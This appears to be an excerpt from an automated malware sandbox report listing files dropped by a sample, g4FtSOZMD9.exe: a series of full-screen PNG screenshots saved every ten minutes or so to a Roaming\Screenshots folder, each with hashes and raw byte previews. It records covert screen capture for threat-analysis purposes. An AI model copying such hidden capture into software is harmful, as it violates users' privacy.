                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805509
                                                                                                                                                                    Entropy (8bit):7.953635790065994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
                                                                                                                                                                    MD5:4334E5318C03DFED4F6E16D617A0070E
                                                                                                                                                                    SHA1:6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
                                                                                                                                                                    SHA-256:AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
                                                                                                                                                                    SHA-512:78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_023804.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805382
                                                                                                                                                                    Entropy (8bit):7.954368693124621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9hbt/BZF0kRX1PBo2x32Y8Ksl7E21b+SCotr8hPUHv1:3qkIctSJnqzRX15l1slPhjVEQ
                                                                                                                                                                    MD5:59B10CCC23A3F39295D44E8032D56A3D
                                                                                                                                                                    SHA1:0CC43E6208D6A7C09B0FB011502D5CFDB4739DD8
                                                                                                                                                                    SHA-256:6946B8089ABF8C6BC48402BBB186D5F75D6D4593763BA925507CB42B8214E7DD
                                                                                                                                                                    SHA-512:DF2D4B5811504B5C1F917429B70F80416185BE76D803C15A9C66FC10CEA08F9D4B734F969A754ECFE48C8A2E8B95530CBB813127853607ED040753D8DB58C694
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_024805.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805480
                                                                                                                                                                    Entropy (8bit):7.954487643604619
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:3qkIctSJnTfCxOkxnhEgaykcreoO+G3Jdk9:3q1c8njC0kdhE7ykaemG3JK9
                                                                                                                                                                    MD5:92F320686B75177FC7391F48BF4E5168
                                                                                                                                                                    SHA1:98989FDBD0723A33552DBE9B64E385DC26FD1B96
                                                                                                                                                                    SHA-256:ED1EA6258EFB31A0706D9B90DF4BB0E1BE8D0AF6534C71B5DAA33E05FC464CA1
                                                                                                                                                                    SHA-512:DDB5F7B0BF164AD953DDDFF832666F0947DA4DA5E1D76DD19ADD0A97D4DB42E86FB89F9A037B631B99061710F7B9158BE5A4B5D1AD7D102DC3034EEA65C8A364
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_025806.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):796305
                                                                                                                                                                    Entropy (8bit):7.956551030400023
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:pgadi5RPDNuzJ21nUyvXrnNUgSSGy1dVm4xc1s8UWbWohhLU+OZbpT8vOKwM:Wai5VsY6y/rnRSSG+oA/8jfUNjT8yM
                                                                                                                                                                    MD5:E099E6FD610B4ABD9E458B952610093F
                                                                                                                                                                    SHA1:EF9E59145E10513258A29A5FA77F92B43F503FB7
                                                                                                                                                                    SHA-256:ACAB39564DB57ACE8867707BA6D846FBDDF18993465AF31BDBAE7455C48D4A7F
                                                                                                                                                                    SHA-512:3DAA2298F1110D8EE4EDD8923D6B494E0B289AB8CDE5963347255BEEB67AB9A32699CB815B9C37312770C0BB73DC4B057CB494AADC1D9D32224404513C7B27AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...%E..}...\...af`.!G....A.......(.s.Y23.$E..J0_........D.!'ef...jU..j..z..g..>..{......Tw..-..3....K.e....^...2.......0.%.K..~..D.R.$,.a1Ko...F!i8J..X7d.....S>.24....v!.|_.q.m.X.=_..rX|...b.....1t.e.E..r.P.:.....Au......).V...Q..O.Z..".e..kU...Q.J....{........Vw.-.Z...(.dLh......S.5...v.d...B.....|K.......E!...g.nn....W.Z...x...-(.a..6.%X..dx...,C.:tl.u..7..7p......{........O.$`h.._..W[ZZ,.C..<...q]....E.@sj....:p.....v......G.....q.k.W...$!..b@.]Am ...^c.`.?@..DY.C.O.].g;T.y.F..pc...._.j.......=.."P........6..~.}...}....Z.....c ..`.PO|n.S....(.\&fc*;S....)...`>>~.. m..Y...G..`7..EfA............`_.6.%..7D....}H....6=k.......JK.<M+.Z.=[.....{.].*.....sx....5.+...v@mM..%..?d...e|.C..'mT..7fa[..U.....i[P..(,.........cE...M ...I_.,FE.n..)..4.....b.B....j.MO.Z...VN~.. |=@.vx.0%W.dT...P.".N...52.F....c.r..|$..y....^..._VA:..S.9..4..(+.A,....(%.~:<._...W..f].|........
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_030807.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805504
                                                                                                                                                                    Entropy (8bit):7.953798912951398
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:N587VkYbbsxNdJHVJhiy7Q4PtMJvQDpeHC:N5eV+dJ1JjTPtMJvG2C
                                                                                                                                                                    MD5:B430A99E7E9D897E03068F795C5E5909
                                                                                                                                                                    SHA1:8395FDA71D9CBB9702A26613A98B1F9E84F25F96
                                                                                                                                                                    SHA-256:D9F1B7AA9789BBCE3D39CBAB82BC9F7A743B81752889B4372BE4B0B2A7DAA63D
                                                                                                                                                                    SHA-512:74A8D4B2F0E3C447307BF81B9163055C57DE5D81EB9994CA9DF0838689281C68E84DF0CCDC48D3D33AB8A902E5C6CB71E7A432F6D45DC3AE93C02C138BFBD2F1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H..%.0.(. . ...8..OG...ET@D..Dr...E.QQ......fE..1.$+..U.V.....w...}....y~OwW...jw....3..3+V....,..j..yN#3..K....-c..*.=?bf...W..Y..f.za.[.p...i...#......Y.....v!V{v.U...`e....+%X.....'..c..e.M.J...0]hJ..........uk....+W.Du..2.\_....JOiS.;Vy..[.x.cv..9f......(.jNh.....7Rd...J...m:.c!A-?..*.r...D...........>...+x.X..K..~.o..b.....].....E..6.f....56w.{..E.<....ekoaf..(bf.....[...,`v.VC..ld.-...K.koS.......).G...,a..^..Z..........[.....+a}.kQ.hMm#:.....(..`..,|x.>r..X.....XY.GB...4...@....c.Va....g.6....b..l.j;O...n..2......i[P..(,..........a.{0&[.8.!5.h*..#.... ..,...-~.3...R.eJ..r0.1....T.L......&.......T....6..m.1........`.S.p,@..R..{bh.P.>$..."....... .8.x......J@i62..c....T.....(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$.
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_031808.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805488
                                                                                                                                                                    Entropy (8bit):7.954279315926631
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:3qkIctSJnuHCn0Wh9lcTchW6IFverrBKFgGA35:3q1c8nuHXWVcwhJNxKFgGA35
                                                                                                                                                                    MD5:BE0ED377FAA193D230EA6DDFA66273E1
                                                                                                                                                                    SHA1:5B5C2D468767F892F87DDE7A2F6287BAB4816A9C
                                                                                                                                                                    SHA-256:74B38C4FD9EACA5D89F369C3D6C898FAD7ADA2F39E60C733E661E4BEA0977F8F
                                                                                                                                                                    SHA-512:20B8B33F3E0BEC8CC177B25BDA475B575C6D3031C8BF850432E5CA0DD6875ADB2D741C74BF7D57DC33FBC90D119410638F7AF907E8164F439A9C671A631E3BE6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_032809.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805490
                                                                                                                                                                    Entropy (8bit):7.95430302145449
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezePK+t5uHCn0pa3qeilgzsuy6/GjM5hi42eRbkeP7+gBml2:3qkIctSJnuHCn0eq6HTr9x5
                                                                                                                                                                    MD5:F681C500672A0C804E44810AADE9A8F6
                                                                                                                                                                    SHA1:00E5B453838C19CAE4CEEB6E581893E1A2113AE2
                                                                                                                                                                    SHA-256:326A257BA12014E1EEC8EA8AF7AD277F87D6FDCB557B80D15F1F908C69CED43B
                                                                                                                                                                    SHA-512:4B175AC60063F92C6C333F1AB901805DE69C0340742D8F394F2B65D6D84F5EDB620F01C8AFE6E4E560BEFAB79E3186760D69EAB026A28270A4E1F76A79B355F8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_033810.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805395
                                                                                                                                                                    Entropy (8bit):7.954631654370981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqF7fDjg1zti6LDxcz9wPU4Z+cf:3qkIctSJnkpT4iFr3gZA6nxc5KN
                                                                                                                                                                    MD5:40FFEEA2BE692EF5B31FA989391A94D4
                                                                                                                                                                    SHA1:9BC465F5F7BE462B048BB6C9DE07043C09466306
                                                                                                                                                                    SHA-256:4DCE4DB74442C126CC6337F1F40878E4C6355BD66B944779B71228FBA25BF4D2
                                                                                                                                                                    SHA-512:700F0998D336BF3F379E152E67F4CDDC3B3ABE74E4223E64CB09E5C9C2D90953577C6ED07D7EAA48F9355D4CB027BFACAD6B3CA9F7C679B6B9A32CF63A71AECB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_034810.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805325
                                                                                                                                                                    Entropy (8bit):7.953809932335241
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezGn0d30f5tEsDRDCO4hpMOd+mrSNKCZ16b3hw7uAGOkIoZ0:3qkIctae0fjLlS7xJrfy6bx68Ort
                                                                                                                                                                    MD5:53035B3321CEE45CA778710FAC73550B
                                                                                                                                                                    SHA1:2DA8C1F262EBDCC8FB5E8E2782711A5805E298EC
                                                                                                                                                                    SHA-256:A2D0C18D0E8F0BAF8DF2A6D5049BA5E183D7D8B866E24D97322AB7A4B71F0F41
                                                                                                                                                                    SHA-512:7D7A318BD4C6B756DC3B8722B2562FEFE20FDCFB0E64E01EED84ECF38042A6010795F0D91D54A2845059D8F56B72D64F0FF6B4EE2BC10C09763F04D388A31943
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_035812.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805509
                                                                                                                                                                    Entropy (8bit):7.953635790065994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
                                                                                                                                                                    MD5:4334E5318C03DFED4F6E16D617A0070E
                                                                                                                                                                    SHA1:6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
                                                                                                                                                                    SHA-256:AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
                                                                                                                                                                    SHA-512:78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_040812.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805509
                                                                                                                                                                    Entropy (8bit):7.953635790065994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
                                                                                                                                                                    MD5:4334E5318C03DFED4F6E16D617A0070E
                                                                                                                                                                    SHA1:6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
                                                                                                                                                                    SHA-256:AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
                                                                                                                                                                    SHA-512:78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_041814.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805441
                                                                                                                                                                    Entropy (8bit):7.954613568850628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
                                                                                                                                                                    MD5:277253D7D217CD0CACB4715BF3175D31
                                                                                                                                                                    SHA1:AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
                                                                                                                                                                    SHA-256:15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
                                                                                                                                                                    SHA-512:634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_042814.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805441
                                                                                                                                                                    Entropy (8bit):7.954613568850628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
                                                                                                                                                                    MD5:277253D7D217CD0CACB4715BF3175D31
                                                                                                                                                                    SHA1:AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
